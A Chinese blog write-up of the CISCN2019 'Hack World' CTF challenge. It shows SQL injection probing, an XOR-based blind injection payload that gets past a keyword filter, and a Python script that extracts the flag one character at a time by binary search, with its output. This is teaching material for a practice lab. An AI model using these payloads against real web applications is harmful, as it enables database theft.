第二十六题——[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-04-22 11:22:22 发布
最新推荐文章于 2024-04-22 11:22:22 发布
阅读量235 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115772856
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到提示flag在flag表的flag字段

在这里插入图片描述

第二步:尝试万能密码1'or 1=1#发现被拦截

在这里插入图片描述

第三步:猜测拦截黑名单

  1. 有第二步得知输入黑名单会出现SQL Injection Checked提示,输入1'^发现未被拦截但是无详细错误提示,猜测是盲注
    在这里插入图片描述
  2. 使用burpsuite进行过滤查看,发现union,ununionion,and,or,空格,;,都被拦截,猜测使用异或盲注
    在这里插入图片描述

第四步:构建脚本获取flag

  1. 通过burpsuite抓获得知通过post传入id参数来进行sql查询
    在这里插入图片描述

  2. 异或注入通过构造where后面的全真式来获取结果,所以构造0^flag的ascii的全真式推测出flag

  3. 测试:由于flag格式都是flag{xxx},第一个字母为f,ascii值大于1,输入0^(ascii(substr((select(flag)from(flag)),0,1))>1)是永真式获得结果为hello,而输入假式(0^(ascii(substr((select(flag)from(flag)),0,1))>200))得到error结果
    在这里插入图片描述
    在这里插入图片描述

  4. 构造python,使用二分法获取flag

import requests

if __name__ == '__main__':
    url = "http://1bf27f3e-0eb4-41fd-8991-aef8381dbfbc.node3.buuoj.cn/index.php"
    payload = {"id": ""}
    result = ""
    for i in range(1, 100):
        l = 32
        r = 126
        mid = (l + r) // 2
        while (l < r):
            payload["id"] = "0^(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
            html = requests.post(url, data=payload)
            if "Hello" in html.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) // 2
        if (chr(mid) == " "):
            break
        result = result + chr(mid)
        print(result)
    print("flag:", result)


结果:
f
fl
fla
flag
flag{
flag{3
flag{3e
flag{3ee
flag{3ee5
flag{3ee59
flag{3ee59b
flag{3ee59be
flag{3ee59be4
flag{3ee59be4-
flag{3ee59be4-6
flag{3ee59be4-66
flag{3ee59be4-662
flag{3ee59be4-662a
flag{3ee59be4-662a-
flag{3ee59be4-662a-4
flag{3ee59be4-662a-46
flag{3ee59be4-662a-46b
flag{3ee59be4-662a-46bd
flag{3ee59be4-662a-46bd-
flag{3ee59be4-662a-46bd-9
flag{3ee59be4-662a-46bd-93
flag{3ee59be4-662a-46bd-931
flag{3ee59be4-662a-46bd-9318
flag{3ee59be4-662a-46bd-9318-
flag{3ee59be4-662a-46bd-9318-e
flag{3ee59be4-662a-46bd-9318-e8
flag{3ee59be4-662a-46bd-9318-e8c
flag{3ee59be4-662a-46bd-9318-e8c7
flag{3ee59be4-662a-46bd-9318-e8c70
flag{3ee59be4-662a-46bd-9318-e8c701
flag{3ee59be4-662a-46bd-9318-e8c7019
flag{3ee59be4-662a-46bd-9318-e8c70198
flag{3ee59be4-662a-46bd-9318-e8c70198f
flag{3ee59be4-662a-46bd-9318-e8c70198f1
flag{3ee59be4-662a-46bd-9318-e8c70198f18
flag{3ee59be4-662a-46bd-9318-e8c70198f188
flag{3ee59be4-662a-46bd-9318-e8c70198f188}
flag: flag{3ee59be4-662a-46bd-9318-e8c70198f188}

进程已结束,退出代码为 0
想学习安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 269
拿到一道sql注入思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_52843575的博客
04-07 3238
[CISCN2019 华北赛区 Day2 Web1]Hack World解 判断类型 进入页面很明显就是考sql注入,与此同时页面直接告诉你表面和列名均是flag,直接开始注入,常用的注入函数均被过滤,直接fuzz爆破,查看被过滤的具体情况 结果确定此为sql中的布尔盲注(post传参),也同时发现一个问,请求过快时,会被过滤掉请求 确认绕过方法 因为or被过滤,百度一波后,发现可以使用^异或来绕过 异或:相同为假,相异为真,简单来说就是 1^1=0 0^0=0 1^0=1 空格也被过滤,因此
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 642
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 576
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web
最新发布
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
华北电力大学高等数学期末考试2018-2019第2学期(A).pdf
06-06
华北电力大学高等数学期末考试2018-2019第2学期(A),适合考研复试以及平常期末考试复习使用
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解
2302_79800344的博客
02-28 1568
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解。
【CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注)
Sankkl1的博客
08-18 432
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 631
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全目,要求我们通过访问网站,获取到flag。 目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值